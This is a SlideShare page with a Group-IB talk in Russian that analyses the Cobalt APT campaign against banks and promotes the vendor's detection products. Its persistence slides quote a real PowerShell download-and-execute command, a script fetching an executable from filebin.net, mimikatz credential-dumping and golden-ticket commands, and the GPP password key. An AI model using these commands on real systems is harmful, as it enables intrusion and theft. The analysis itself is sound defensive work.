SlideShare a Scribd company logo
1 of 24
Download to read offline
1
Жизнь богаче схем
( APT Cobalt на кончиках пальцев)
Докладчик:
Сергей Золотухин
Менеджер по развитию бизнеса
Group-IB
GROUP-IB.COM
Временная шкала целевых атак
*Cobalt was detected in June
2
3
Почему невозможно быть полностью защищенным
ТЫСЯЧИ
СОТРУДНИКОВ
Не все сотрудники
эксперты по безопасности.
Им надо получать и
открывать письма от
коллег, руководства и т.д.
для выполнения своих
служебных обязанностей
Атакующие могут
звонить прежде чем
отправить письмо,
воспользоваться
взломанной почтой
коллег
Многие просто покупают
решения по безопасности и
чувствуют себя
защищёнными, перекладывая
ответственность на вендора.
Нет процедуры реагирования
на инцидент
УМНЫЙ
ФИШИНГ
СТАРАЯ
ПАРАДИГМА
10 минут
время необходимое
для получения полного
контроля над сетью
4
Шаблон атак легко копировать
1
Целевой фишинг,
покупка загрузок,
уязвимость во внешней
системе
Собирают реквизиты доступа к
центральным серверам и
пароли администраторов
использую открытую утилиту
Mimikatz
НАЧАЛЬНОЕ
ПРОНИКНОВЕНИЕ 2 УДАЛЕННЫЙ
ДОСТУП 3 ПОЛУЧЕНИЕ
ПРИВИЛЕГИЙ
6 ПРОТИВОДЕЙСТВИЕ
РАССЛЕДОВАНИЮ
Атакующие используют
удаленный доступ для
более глубокого
проникновения в сети
Атакующие ищут компьютеры с
которых можно получить
доступ к критичным системам
(АРМ КБР, SWIFT, карточный
процессинг, системы
управления банкоматами)
Получают доступ к
системам, как легитимный
оператор, наблюдают за
ним и выполняют те же
действия
Уничтожают данные после
атаки и компьютеры
5 ЗАВЕРШЕНИЕ
АТАКИ4 СБОР
ДАННЫХ
5
Фишинг
6
Закрепление на локальной системе
ЭКСПЛОЙТ,
EXE, VBS-СКРИПТ
Троян в зашифрованном архиве
CVE-2015-1641
VBS скрипт
Вредоносный модуль
загружается и
храниться только в
оперативной памяти
Получение списка легитимного ПО в
автозагрузке и замена исполняемых
файлов:
• iusb3mon. exe (Intel(R) USB 3.0 eXtensible
Host Controller)
• jusched.exe (Sun Java Update Scheduler)
Либо создания задач в Windows Scheduler
ОПЕРАТИВНАЯ
ПАМЯТЬ
АВТОЗАГРУЗКА
И ЛЕГАЛЬНОЕ ПО
PowerShell скрипт:
«C:Windowssystem32cmd.exe - powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://84.200.84.241:800/arp'))»
VBS скрипт:
var u = 'https://filebin.net/1xpzydyqftzdm48k/cmd.exe'.split(',');for(i = 0; i < u.length; i++){try{var h = new
ActiveXObject('msxml2.xmlhttp');h.open('GET', u[i], false);h.send();if(h.status == 200 && h.responsetext.substr(0, 2) == 'MZ')
7
Повышение привилегий
ОШИБКА КОНФИГУРАЦИИ
КОНТРОЛЛЕРА ДОМЕНА
• Использование Group Policy Preferences (GPP)
• «[server_name]sysvol[domain_name]Policies[group_policy_na
me]MachinePreferencesGroupsGroups.xml»
• Из файла Groups.xml они извлекают логин и пароль
администратора домена из полей cpassword и userName.
(пароль в зашифрованном с помощью AES-256 алгоритме и
закодированном по Base64)
• Для получения пароля в открытом виде атакующие
декодируют пароль по Base64
• Полученный зашифрованный пароль расшифровывается
с помощью ключа
4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a43
3b66c1b
8
Повышение привилегий
УТИЛИТА MIMIKATZ
Есть доступ к DC
mimikatz sekurlsa::logonpasswords
Нет доступа к DC, но есть LA
Подключение к рабочим станциям и серверам с целью поиска
учетной записи с доступом к DC
Нет прав LA и нет доступа к DC
CVE-2014-4113, CVE-2015-1701, CVE-2015-2363 и CVE-2015-2426,
которые позволяли поднять привилегии до уровня SYSTEM на x32 и x64.
Если на локальной системе не работает, то подключается к другим хостам
пока не найдет уязвимый
Золотой билет
• "privilege::debug" "lsadump::samrpc /patch" exit
• извлечение NTLM-хеш учетной записи krbtgt (Key Distribution Center Service
Account)
• создают файл с золотым TGT билетом
9
Поиск нужных систем с доступом к банкоматной сети
netscan.exe – сетевой сканнер NetScan
patch86.exe – патчинг Termsrv для поддержки одновременных терминальных сессий
plink.exe – консольный ssh клиент для Windows
psexec.exe – консольная утили для удаленного управления на Windows
10
Удаленный доступ
• Легальный удаленный доступ
• HideVNC
• TeamViewer
• AmmyAdmin
11
Программы для банкоматов
ServiceLogicalName - имя сервиса, используемое в качестве аргумента для функции WFSOpen (например «Cash Dispenser Module»).
Cassettes Count - общее число кассет, присутствующих на устройстве. Значение должно быть в интервале от 1 до 15.
Cassette Number - номер кассеты, из которой следует выдать наличность. Значение должно быть в интервале от 1 до 15.
Banknotes Count - число банкнот, которое необходимо выдать из кассеты. Значение должно быть в интервале от 1 до 60.
Dispenses Count - означает какое количество раз необходимо повторить выдачу наличности. Значение должно быть в интервале
от 1 до 60.
Программа, использует стандартные функции по интерфейсу
XFS через XFS Manager (eXtensions for Financial Services).
12
Завершение атаки
13
Система выявления ранее неизвестного
вредоносного кода с использованием
передовых алгоритмов машинного обучения
Скачиваемые файлы
Объекты, скачиваемые
пользователями и их
компьютерами при атаке
их браузеров
и другие ранее неизвестные
вредоносные объекты,
не определяемые
антивирусами
и сигнатурным подходом.
Круглосуточная поддержка
вашей службы безопасности
и сопровождение процесса
реагирования опытными
специалистами Group-IB
Полная конфиденциальность
– обработка и анализ файлов
внутри вашего контура
безопасности
Почтовые вложения
Вредоносные файлы, получаемые
пользователями через почтовую
систему в ходе целевых атак и
применения социальной
инженерии
Целевые атаки
Вредоносное ПО, нацеленное
эксклюзивно на вашу
инфраструктуру
1
4
Сенсор анализа трафика SOC GROUP-IB
Сведения об инцидентах, полученные от
сенсора, классифицируются и
коррелируются в Центре обработки данных.
События анализируются квалифицированными
специалистами Group-IB вручную.
Эксперты SOC уведомят ваших специалистов о
критичных угрозах по телефону и e-mail, а все
результаты анализа будут доступны в
удобном web-интерфейсе.
Опытные специалисты Group-IB берут
на себя работу по выявлению
критичных инцидентов, позволяя вашей
службе ИБ сосредоточиться на
реагировании.
выявляет зараженные узлы,
устанавливая их
взаимодействия
с командными центрами по
признакамвредоносной
активности, разрабатываемым
на основе данных из
уникальных источников.
детектирует сетевые аномалии,
генерируемые вредоносными
программами, при помощи
алгоритмов машинного
обучения.
интегрируется с системой
поведенческого анализа Polygon
для выявления ранее
неизвестного вредоносного
кода.
передает информацию
о выявленных инцидентах в
SOC Group-IB по безопасному
каналу либо в любую
внутреннюю корпоративную
систему учета событий ИБ.
Анализ данных ведется круглосуточно,
без выходных
Как работает TDS
Как выглядит Cobalt при запуске файла на TDS Polygon
Результат проверки на TDS Polygon: оценка вредоносности
Поведенческие маркеры - Вредоносные
Поведенческие маркеры - Прочие
Дерево процессов
Уведомление о критичном инциденте
Результат проверки на TDS Polygon: связанные события
Рассылка Cobalt 10 марта 2017г
Первая волна 10.03.2017, 12:57, Банк 1
Вторая волна 10.03.2017, 15:12, Банк 2
Адрес: media@ecb-europe.com
23
Что делать, чтобы предотвратить APT атаку
КИБЕРРАЗВЕДКА ОБНАРУЖЕНИЕ
РЕАГИРОВАНИЕ
Отслеживайте появление новых
методов и инструментов атак
Используйте специальные системы
обнаружения целевых атак
При обнаружении следов атаки
вызывайте команду профессиональных
криминалистов
Присылайте подозрительные файлы
для анализа – intelligence@group-
ib.ru
АНАЛИЗ
Анализируйте подозрительные
файлы в изолированной среде
Запишитесь на бесплатный тест-драйв
комплекса TDS + Polygon - www.group-ib.ru/tds.html
ЦЕНТР РЕАГИРОВАНИЯ
CERT-GIB
Круглосуточная помощь
опытных специалистов
в реагировании на инциденты
РАССЛЕДОВАНИЯ
И КРИМИНАЛИСТИКА
Безупречный сбор доказательной
базы и оперативное установление
личностей преступников
facebook.com/group-ib
info@group-ib.ruwww.group-ib.ru twitter.com/groupib
+7 495 984 33 64blog.group-ib.ru
Предотвращаем и расследуем
киберпреступления с 2003 года.

More Related Content

What's hot

НТБ. Сергей Шерстюк. "Проблемы контроля привилегированных пользователей и их ...
НТБ. Сергей Шерстюк. "Проблемы контроля привилегированных пользователей и их ...НТБ. Сергей Шерстюк. "Проблемы контроля привилегированных пользователей и их ...
НТБ. Сергей Шерстюк. "Проблемы контроля привилегированных пользователей и их ...Expolink
 
НТБ. Архишин Евгений. "Проблемы контроля привилегированных пользователей и их...
НТБ. Архишин Евгений. "Проблемы контроля привилегированных пользователей и их...НТБ. Архишин Евгений. "Проблемы контроля привилегированных пользователей и их...
НТБ. Архишин Евгений. "Проблемы контроля привилегированных пользователей и их...Expolink
 
Основной вектор атак — приложения
Основной вектор атак — приложенияОсновной вектор атак — приложения
Основной вектор атак — приложенияЭЛВИС-ПЛЮС
 
НТБ. Евгений Архишин. "Система контроля привилегированных пользователей Safe...
НТБ. Евгений Архишин. "Система контроля  привилегированных пользователей Safe...НТБ. Евгений Архишин. "Система контроля  привилегированных пользователей Safe...
НТБ. Евгений Архишин. "Система контроля привилегированных пользователей Safe...Expolink
 
CYBERARK - ЗАЩИТА ПРИВИЛЕГИРОВАННЫХ УЧЕТНЫХ ЗАПИСЕЙ ОТ ВНУТРЕННИХ И ВНЕШНИХ К...
CYBERARK - ЗАЩИТА ПРИВИЛЕГИРОВАННЫХ УЧЕТНЫХ ЗАПИСЕЙ ОТ ВНУТРЕННИХ И ВНЕШНИХ К...CYBERARK - ЗАЩИТА ПРИВИЛЕГИРОВАННЫХ УЧЕТНЫХ ЗАПИСЕЙ ОТ ВНУТРЕННИХ И ВНЕШНИХ К...
CYBERARK - ЗАЩИТА ПРИВИЛЕГИРОВАННЫХ УЧЕТНЫХ ЗАПИСЕЙ ОТ ВНУТРЕННИХ И ВНЕШНИХ К...DialogueScience
 
Эффективные и проблемные SOC-процессы
Эффективные и проблемные SOC-процессыЭффективные и проблемные SOC-процессы
Эффективные и проблемные SOC-процессыPositive Hack Days
 
НТБ. Евгений Архишин. "Решение проблемы контроля привилегированных пользовате...
НТБ. Евгений Архишин. "Решение проблемы контроля привилегированных пользовате...НТБ. Евгений Архишин. "Решение проблемы контроля привилегированных пользовате...
НТБ. Евгений Архишин. "Решение проблемы контроля привилегированных пользовате...Expolink
 
Архитектура защищенного периметра
Архитектура защищенного периметраАрхитектура защищенного периметра
Архитектура защищенного периметраCisco Russia
 
Security Meetup 22 октября. «Мобилки, деньги, два фактора». Дмитрий Евдокимо...
Security Meetup 22 октября. «Мобилки, деньги, два фактора».  Дмитрий Евдокимо...Security Meetup 22 октября. «Мобилки, деньги, два фактора».  Дмитрий Евдокимо...
Security Meetup 22 октября. «Мобилки, деньги, два фактора». Дмитрий Евдокимо...Mail.ru Group
 
НТБ. Евгений Архишин. "Проблемы контроля привилегированных пользователей и их...
НТБ. Евгений Архишин. "Проблемы контроля привилегированных пользователей и их...НТБ. Евгений Архишин. "Проблемы контроля привилегированных пользователей и их...
НТБ. Евгений Архишин. "Проблемы контроля привилегированных пользователей и их...Expolink
 
Целенаправленные атаки на мобильные устройства
Целенаправленные атаки на мобильные устройстваЦеленаправленные атаки на мобильные устройства
Целенаправленные атаки на мобильные устройстваDialogueScience
 
SOC в большой корпоративной сети. Challenge accepted
SOC в большой корпоративной сети. Challenge acceptedSOC в большой корпоративной сети. Challenge accepted
SOC в большой корпоративной сети. Challenge acceptedPositive Hack Days
 
Security Meetup 22 октября. «Реверс-инжиниринг в Enterprise». Александр Секре...
Security Meetup 22 октября. «Реверс-инжиниринг в Enterprise». Александр Секре...Security Meetup 22 октября. «Реверс-инжиниринг в Enterprise». Александр Секре...
Security Meetup 22 октября. «Реверс-инжиниринг в Enterprise». Александр Секре...Mail.ru Group
 
Anti-Malware. Илья Шабанов. " Как контролировать системных администраторов и ...
Anti-Malware. Илья Шабанов. " Как контролировать системных администраторов и ...Anti-Malware. Илья Шабанов. " Как контролировать системных администраторов и ...
Anti-Malware. Илья Шабанов. " Как контролировать системных администраторов и ...Expolink
 
Нюансы функционирования и эксплуатации Cisco SOC
Нюансы функционирования и эксплуатации Cisco SOCНюансы функционирования и эксплуатации Cisco SOC
Нюансы функционирования и эксплуатации Cisco SOCAleksey Lukatskiy
 
InfoWatch. Олег Коробейников. "Защита от внутренних угроз и таргетированных а...
InfoWatch. Олег Коробейников. "Защита от внутренних угроз и таргетированных а...InfoWatch. Олег Коробейников. "Защита от внутренних угроз и таргетированных а...
InfoWatch. Олег Коробейников. "Защита от внутренних угроз и таргетированных а...Expolink
 

What's hot (20)

НТБ. Сергей Шерстюк. "Проблемы контроля привилегированных пользователей и их ...
НТБ. Сергей Шерстюк. "Проблемы контроля привилегированных пользователей и их ...НТБ. Сергей Шерстюк. "Проблемы контроля привилегированных пользователей и их ...
НТБ. Сергей Шерстюк. "Проблемы контроля привилегированных пользователей и их ...
 
НТБ. Архишин Евгений. "Проблемы контроля привилегированных пользователей и их...
НТБ. Архишин Евгений. "Проблемы контроля привилегированных пользователей и их...НТБ. Архишин Евгений. "Проблемы контроля привилегированных пользователей и их...
НТБ. Архишин Евгений. "Проблемы контроля привилегированных пользователей и их...
 
12 причин хорошего SOC
12 причин хорошего SOC12 причин хорошего SOC
12 причин хорошего SOC
 
Основной вектор атак — приложения
Основной вектор атак — приложенияОсновной вектор атак — приложения
Основной вектор атак — приложения
 
Imperva, держи марку!
Imperva, держи марку! Imperva, держи марку!
Imperva, держи марку!
 
НТБ. Евгений Архишин. "Система контроля привилегированных пользователей Safe...
НТБ. Евгений Архишин. "Система контроля  привилегированных пользователей Safe...НТБ. Евгений Архишин. "Система контроля  привилегированных пользователей Safe...
НТБ. Евгений Архишин. "Система контроля привилегированных пользователей Safe...
 
CYBERARK - ЗАЩИТА ПРИВИЛЕГИРОВАННЫХ УЧЕТНЫХ ЗАПИСЕЙ ОТ ВНУТРЕННИХ И ВНЕШНИХ К...
CYBERARK - ЗАЩИТА ПРИВИЛЕГИРОВАННЫХ УЧЕТНЫХ ЗАПИСЕЙ ОТ ВНУТРЕННИХ И ВНЕШНИХ К...CYBERARK - ЗАЩИТА ПРИВИЛЕГИРОВАННЫХ УЧЕТНЫХ ЗАПИСЕЙ ОТ ВНУТРЕННИХ И ВНЕШНИХ К...
CYBERARK - ЗАЩИТА ПРИВИЛЕГИРОВАННЫХ УЧЕТНЫХ ЗАПИСЕЙ ОТ ВНУТРЕННИХ И ВНЕШНИХ К...
 
Эффективные и проблемные SOC-процессы
Эффективные и проблемные SOC-процессыЭффективные и проблемные SOC-процессы
Эффективные и проблемные SOC-процессы
 
НТБ. Евгений Архишин. "Решение проблемы контроля привилегированных пользовате...
НТБ. Евгений Архишин. "Решение проблемы контроля привилегированных пользовате...НТБ. Евгений Архишин. "Решение проблемы контроля привилегированных пользовате...
НТБ. Евгений Архишин. "Решение проблемы контроля привилегированных пользовате...
 
Архитектура защищенного периметра
Архитектура защищенного периметраАрхитектура защищенного периметра
Архитектура защищенного периметра
 
Security Meetup 22 октября. «Мобилки, деньги, два фактора». Дмитрий Евдокимо...
Security Meetup 22 октября. «Мобилки, деньги, два фактора».  Дмитрий Евдокимо...Security Meetup 22 октября. «Мобилки, деньги, два фактора».  Дмитрий Евдокимо...
Security Meetup 22 октября. «Мобилки, деньги, два фактора». Дмитрий Евдокимо...
 
НТБ. Евгений Архишин. "Проблемы контроля привилегированных пользователей и их...
НТБ. Евгений Архишин. "Проблемы контроля привилегированных пользователей и их...НТБ. Евгений Архишин. "Проблемы контроля привилегированных пользователей и их...
НТБ. Евгений Архишин. "Проблемы контроля привилегированных пользователей и их...
 
Целенаправленные атаки на мобильные устройства
Целенаправленные атаки на мобильные устройстваЦеленаправленные атаки на мобильные устройства
Целенаправленные атаки на мобильные устройства
 
Будущее кибербезопасности
Будущее кибербезопасностиБудущее кибербезопасности
Будущее кибербезопасности
 
SOC в большой корпоративной сети. Challenge accepted
SOC в большой корпоративной сети. Challenge acceptedSOC в большой корпоративной сети. Challenge accepted
SOC в большой корпоративной сети. Challenge accepted
 
Security Meetup 22 октября. «Реверс-инжиниринг в Enterprise». Александр Секре...
Security Meetup 22 октября. «Реверс-инжиниринг в Enterprise». Александр Секре...Security Meetup 22 октября. «Реверс-инжиниринг в Enterprise». Александр Секре...
Security Meetup 22 октября. «Реверс-инжиниринг в Enterprise». Александр Секре...
 
Anti-Malware. Илья Шабанов. " Как контролировать системных администраторов и ...
Anti-Malware. Илья Шабанов. " Как контролировать системных администраторов и ...Anti-Malware. Илья Шабанов. " Как контролировать системных администраторов и ...
Anti-Malware. Илья Шабанов. " Как контролировать системных администраторов и ...
 
Киберугрозы будущего
Киберугрозы будущегоКиберугрозы будущего
Киберугрозы будущего
 
Нюансы функционирования и эксплуатации Cisco SOC
Нюансы функционирования и эксплуатации Cisco SOCНюансы функционирования и эксплуатации Cisco SOC
Нюансы функционирования и эксплуатации Cisco SOC
 
InfoWatch. Олег Коробейников. "Защита от внутренних угроз и таргетированных а...
InfoWatch. Олег Коробейников. "Защита от внутренних угроз и таргетированных а...InfoWatch. Олег Коробейников. "Защита от внутренних угроз и таргетированных а...
InfoWatch. Олег Коробейников. "Защита от внутренних угроз и таргетированных а...
 

Similar to Жизнь богаче схем ( APT Cobalt на кончиках пальцев). Сергей Золотухин, Group-IB

Архитектура защищенного периметра
Архитектура защищенного периметраАрхитектура защищенного периметра
Архитектура защищенного периметраCisco Russia
 
История из жизни. Демонстрация работы реального злоумышленника на примере ата...
История из жизни. Демонстрация работы реального злоумышленника на примере ата...История из жизни. Демонстрация работы реального злоумышленника на примере ата...
История из жизни. Демонстрация работы реального злоумышленника на примере ата...Dmitry Evteev
 
Тенденции киберугроз. Что необходимо знать?
Тенденции киберугроз. Что необходимо знать?Тенденции киберугроз. Что необходимо знать?
Тенденции киберугроз. Что необходимо знать?Aleksey Lukatskiy
 
Какие вопросы чаще всего задают вендору при выборе решения по информационной ...
Какие вопросы чаще всего задают вендору при выборе решения по информационной ...Какие вопросы чаще всего задают вендору при выборе решения по информационной ...
Какие вопросы чаще всего задают вендору при выборе решения по информационной ...Denis Batrankov, CISSP
 
Н.Романов (Trend micro) - Скрытые угрозы: можно ли тайное сделать явным?
Н.Романов (Trend micro) - Скрытые угрозы: можно ли тайное сделать явным?Н.Романов (Trend micro) - Скрытые угрозы: можно ли тайное сделать явным?
Н.Романов (Trend micro) - Скрытые угрозы: можно ли тайное сделать явным?Expolink
 
FireEye - система защиты от целенаправленных атак
FireEye - система защиты от целенаправленных атакFireEye - система защиты от целенаправленных атак
FireEye - система защиты от целенаправленных атакDialogueScience
 
Системы предотвращения вторжений нового поколения
Системы предотвращения вторжений нового поколенияСистемы предотвращения вторжений нового поколения
Системы предотвращения вторжений нового поколенияCisco Russia
 
Целенаправленные атаки
Целенаправленные атакиЦеленаправленные атаки
Целенаправленные атакиInfoWatch
 
Application Security - ответы на ежедневные вопросы / Сергей Белов (Mail.Ru G...
Application Security - ответы на ежедневные вопросы / Сергей Белов (Mail.Ru G...Application Security - ответы на ежедневные вопросы / Сергей Белов (Mail.Ru G...
Application Security - ответы на ежедневные вопросы / Сергей Белов (Mail.Ru G...Ontico
 
Контрольный список для предотвращения атак программ-вымогателей
Контрольный список для предотвращения атак программ-вымогателейКонтрольный список для предотвращения атак программ-вымогателей
Контрольный список для предотвращения атак программ-вымогателейCisco Russia
 
Построение защищенного Интернет-периметра
Построение защищенного Интернет-периметраПостроение защищенного Интернет-периметра
Построение защищенного Интернет-периметраCisco Russia
 
Fireeye 201FireEye - система защиты от целенаправленных атак5
Fireeye  201FireEye - система защиты от целенаправленных атак5Fireeye  201FireEye - система защиты от целенаправленных атак5
Fireeye 201FireEye - система защиты от целенаправленных атак5DialogueScience
 
Продуктовая линейка компании «Код Безопасности»
Продуктовая линейка компании «Код Безопасности» Продуктовая линейка компании «Код Безопасности»
Продуктовая линейка компании «Код Безопасности» LETA IT-company
 
Ростелеком. Ольга Макарова. "Информацинная безопасность в современных реалиях...
Ростелеком. Ольга Макарова. "Информацинная безопасность в современных реалиях...Ростелеком. Ольга Макарова. "Информацинная безопасность в современных реалиях...
Ростелеком. Ольга Макарова. "Информацинная безопасность в современных реалиях...Expolink
 
защита по для банкоматов
защита по для банкоматовзащита по для банкоматов
защита по для банкоматовExpolink
 
Решения КРОК для противодействия направленным атакам
Решения КРОК для противодействия направленным атакамРешения КРОК для противодействия направленным атакам
Решения КРОК для противодействия направленным атакамКРОК
 
Upd pci compliance
Upd pci compliance Upd pci compliance
Upd pci compliance BAKOTECH
 
Емельянников_Безопасность электронного бизнеса
Емельянников_Безопасность электронного бизнесаЕмельянников_Безопасность электронного бизнеса
Емельянников_Безопасность электронного бизнесаMikhail Emeliyannikov
 
Как превратить свою сеть в систему информационной безопасности
Как превратить свою сеть в систему информационной безопасности Как превратить свою сеть в систему информационной безопасности
Как превратить свою сеть в систему информационной безопасности Cisco Russia
 
Надёжная Kомпьютерная Инициатива - ответ сегодняшним рискам ИT безопасности 2...
Надёжная Kомпьютерная Инициатива - ответ сегодняшним рискам ИT безопасности 2...Надёжная Kомпьютерная Инициатива - ответ сегодняшним рискам ИT безопасности 2...
Надёжная Kомпьютерная Инициатива - ответ сегодняшним рискам ИT безопасности 2...ebuc
 

Similar to Жизнь богаче схем ( APT Cobalt на кончиках пальцев). Сергей Золотухин, Group-IB (20)

Архитектура защищенного периметра
Архитектура защищенного периметраАрхитектура защищенного периметра
Архитектура защищенного периметра
 
История из жизни. Демонстрация работы реального злоумышленника на примере ата...
История из жизни. Демонстрация работы реального злоумышленника на примере ата...История из жизни. Демонстрация работы реального злоумышленника на примере ата...
История из жизни. Демонстрация работы реального злоумышленника на примере ата...
 
Тенденции киберугроз. Что необходимо знать?
Тенденции киберугроз. Что необходимо знать?Тенденции киберугроз. Что необходимо знать?
Тенденции киберугроз. Что необходимо знать?
 
Какие вопросы чаще всего задают вендору при выборе решения по информационной ...
Какие вопросы чаще всего задают вендору при выборе решения по информационной ...Какие вопросы чаще всего задают вендору при выборе решения по информационной ...
Какие вопросы чаще всего задают вендору при выборе решения по информационной ...
 
Н.Романов (Trend micro) - Скрытые угрозы: можно ли тайное сделать явным?
Н.Романов (Trend micro) - Скрытые угрозы: можно ли тайное сделать явным?Н.Романов (Trend micro) - Скрытые угрозы: можно ли тайное сделать явным?
Н.Романов (Trend micro) - Скрытые угрозы: можно ли тайное сделать явным?
 
FireEye - система защиты от целенаправленных атак
FireEye - система защиты от целенаправленных атакFireEye - система защиты от целенаправленных атак
FireEye - система защиты от целенаправленных атак
 
Системы предотвращения вторжений нового поколения
Системы предотвращения вторжений нового поколенияСистемы предотвращения вторжений нового поколения
Системы предотвращения вторжений нового поколения
 
Целенаправленные атаки
Целенаправленные атакиЦеленаправленные атаки
Целенаправленные атаки
 
Application Security - ответы на ежедневные вопросы / Сергей Белов (Mail.Ru G...
Application Security - ответы на ежедневные вопросы / Сергей Белов (Mail.Ru G...Application Security - ответы на ежедневные вопросы / Сергей Белов (Mail.Ru G...
Application Security - ответы на ежедневные вопросы / Сергей Белов (Mail.Ru G...
 
Контрольный список для предотвращения атак программ-вымогателей
Контрольный список для предотвращения атак программ-вымогателейКонтрольный список для предотвращения атак программ-вымогателей
Контрольный список для предотвращения атак программ-вымогателей
 
Построение защищенного Интернет-периметра
Построение защищенного Интернет-периметраПостроение защищенного Интернет-периметра
Построение защищенного Интернет-периметра
 
Fireeye 201FireEye - система защиты от целенаправленных атак5
Fireeye  201FireEye - система защиты от целенаправленных атак5Fireeye  201FireEye - система защиты от целенаправленных атак5
Fireeye 201FireEye - система защиты от целенаправленных атак5
 
Продуктовая линейка компании «Код Безопасности»
Продуктовая линейка компании «Код Безопасности» Продуктовая линейка компании «Код Безопасности»
Продуктовая линейка компании «Код Безопасности»
 
Ростелеком. Ольга Макарова. "Информацинная безопасность в современных реалиях...
Ростелеком. Ольга Макарова. "Информацинная безопасность в современных реалиях...Ростелеком. Ольга Макарова. "Информацинная безопасность в современных реалиях...
Ростелеком. Ольга Макарова. "Информацинная безопасность в современных реалиях...
 
защита по для банкоматов
защита по для банкоматовзащита по для банкоматов
защита по для банкоматов
 
Решения КРОК для противодействия направленным атакам
Решения КРОК для противодействия направленным атакамРешения КРОК для противодействия направленным атакам
Решения КРОК для противодействия направленным атакам
 
Upd pci compliance
Upd pci compliance Upd pci compliance
Upd pci compliance
 
Емельянников_Безопасность электронного бизнеса
Емельянников_Безопасность электронного бизнесаЕмельянников_Безопасность электронного бизнеса
Емельянников_Безопасность электронного бизнеса
 
Как превратить свою сеть в систему информационной безопасности
Как превратить свою сеть в систему информационной безопасности Как превратить свою сеть в систему информационной безопасности
Как превратить свою сеть в систему информационной безопасности
 
Надёжная Kомпьютерная Инициатива - ответ сегодняшним рискам ИT безопасности 2...
Надёжная Kомпьютерная Инициатива - ответ сегодняшним рискам ИT безопасности 2...Надёжная Kомпьютерная Инициатива - ответ сегодняшним рискам ИT безопасности 2...
Надёжная Kомпьютерная Инициатива - ответ сегодняшним рискам ИT безопасности 2...
 

More from Банковское обозрение

Галина Горшенина, АРБ: «Оценка для целей залога земель сельскохозяйственного ...
Галина Горшенина, АРБ: «Оценка для целей залога земель сельскохозяйственного ...Галина Горшенина, АРБ: «Оценка для целей залога земель сельскохозяйственного ...
Галина Горшенина, АРБ: «Оценка для целей залога земель сельскохозяйственного ...Банковское обозрение
 
Максим Русаков, SRG: «Автоматизация контроля залоговой стоимости недвижимости»
Максим Русаков, SRG: «Автоматизация контроля залоговой стоимости недвижимости»Максим Русаков, SRG: «Автоматизация контроля залоговой стоимости недвижимости»
Максим Русаков, SRG: «Автоматизация контроля залоговой стоимости недвижимости»Банковское обозрение
 
Евгений Федоров. НАОК: «Сотрудничество с банками в смежных с оценкой областях»
Евгений Федоров. НАОК: «Сотрудничество с банками в смежных с оценкой областях»Евгений Федоров. НАОК: «Сотрудничество с банками в смежных с оценкой областях»
Евгений Федоров. НАОК: «Сотрудничество с банками в смежных с оценкой областях»Банковское обозрение
 
Владимир Гамза, ТПП РФ: «Проблемы использования объектов интеллектуальной соб...
Владимир Гамза, ТПП РФ: «Проблемы использования объектов интеллектуальной соб...Владимир Гамза, ТПП РФ: «Проблемы использования объектов интеллектуальной соб...
Владимир Гамза, ТПП РФ: «Проблемы использования объектов интеллектуальной соб...Банковское обозрение
 
Сергей Федоренков, ТрансКапиталБанк: «Оптимизация процессов залогового сервиса»
Сергей Федоренков, ТрансКапиталБанк: «Оптимизация процессов залогового сервиса»Сергей Федоренков, ТрансКапиталБанк: «Оптимизация процессов залогового сервиса»
Сергей Федоренков, ТрансКапиталБанк: «Оптимизация процессов залогового сервиса»Банковское обозрение
 
Константин Клепак, МТС-Банк: «Некоторые особенности залога отдельных видов им...
Константин Клепак, МТС-Банк: «Некоторые особенности залога отдельных видов им...Константин Клепак, МТС-Банк: «Некоторые особенности залога отдельных видов им...
Константин Клепак, МТС-Банк: «Некоторые особенности залога отдельных видов им...Банковское обозрение
 
Алексей Кравцов, Арбитражный третейский суд Москвы: «Как добиться взыскания з...
Алексей Кравцов, Арбитражный третейский суд Москвы: «Как добиться взыскания з...Алексей Кравцов, Арбитражный третейский суд Москвы: «Как добиться взыскания з...
Алексей Кравцов, Арбитражный третейский суд Москвы: «Как добиться взыскания з...Банковское обозрение
 
Ирина Вишневская, «Беркшир Адвайзори Групп»: «Ликвидность залогов»
Ирина Вишневская, «Беркшир Адвайзори Групп»: «Ликвидность залогов»Ирина Вишневская, «Беркшир Адвайзори Групп»: «Ликвидность залогов»
Ирина Вишневская, «Беркшир Адвайзори Групп»: «Ликвидность залогов»Банковское обозрение
 
Олег Визгалин, ВЭБ: «Управление залогом. Новые возможности и перспективы»
Олег Визгалин, ВЭБ: «Управление залогом. Новые возможности и перспективы»Олег Визгалин, ВЭБ: «Управление залогом. Новые возможности и перспективы»
Олег Визгалин, ВЭБ: «Управление залогом. Новые возможности и перспективы»Банковское обозрение
 
Александр Сагин, Федеральная нотариальная палата: «Реестр уведомлений о залог...
Александр Сагин, Федеральная нотариальная палата: «Реестр уведомлений о залог...Александр Сагин, Федеральная нотариальная палата: «Реестр уведомлений о залог...
Александр Сагин, Федеральная нотариальная палата: «Реестр уведомлений о залог...Банковское обозрение
 
Оксана Мишининская, Росреестр: «Сервис по государственной регистрации прав в ...
Оксана Мишининская, Росреестр: «Сервис по государственной регистрации прав в ...Оксана Мишининская, Росреестр: «Сервис по государственной регистрации прав в ...
Оксана Мишининская, Росреестр: «Сервис по государственной регистрации прав в ...Банковское обозрение
 
Павел Русаков, «Мобильный оценщик»: «Автоматизация оценки и управления недвиж...
Павел Русаков, «Мобильный оценщик»: «Автоматизация оценки и управления недвиж...Павел Русаков, «Мобильный оценщик»: «Автоматизация оценки и управления недвиж...
Павел Русаков, «Мобильный оценщик»: «Автоматизация оценки и управления недвиж...Банковское обозрение
 
Галина Горшенина, АРБ: «Оценка для целей залога земель сельскохозяйственного ...
Галина Горшенина, АРБ: «Оценка для целей залога земель сельскохозяйственного ...Галина Горшенина, АРБ: «Оценка для целей залога земель сельскохозяйственного ...
Галина Горшенина, АРБ: «Оценка для целей залога земель сельскохозяйственного ...Банковское обозрение
 
Александр Слуцкий, НАОК: «Изменения в федеральный стандарт оценки «Оценка для...
Александр Слуцкий, НАОК: «Изменения в федеральный стандарт оценки «Оценка для...Александр Слуцкий, НАОК: «Изменения в федеральный стандарт оценки «Оценка для...
Александр Слуцкий, НАОК: «Изменения в федеральный стандарт оценки «Оценка для...Банковское обозрение
 
Татьяна Морозова, ЦБ РФ: «Применение норм Инструкций Банка России № 176-И, 14...
Татьяна Морозова, ЦБ РФ: «Применение норм Инструкций Банка России № 176-И, 14...Татьяна Морозова, ЦБ РФ: «Применение норм Инструкций Банка России № 176-И, 14...
Татьяна Морозова, ЦБ РФ: «Применение норм Инструкций Банка России № 176-И, 14...Банковское обозрение
 
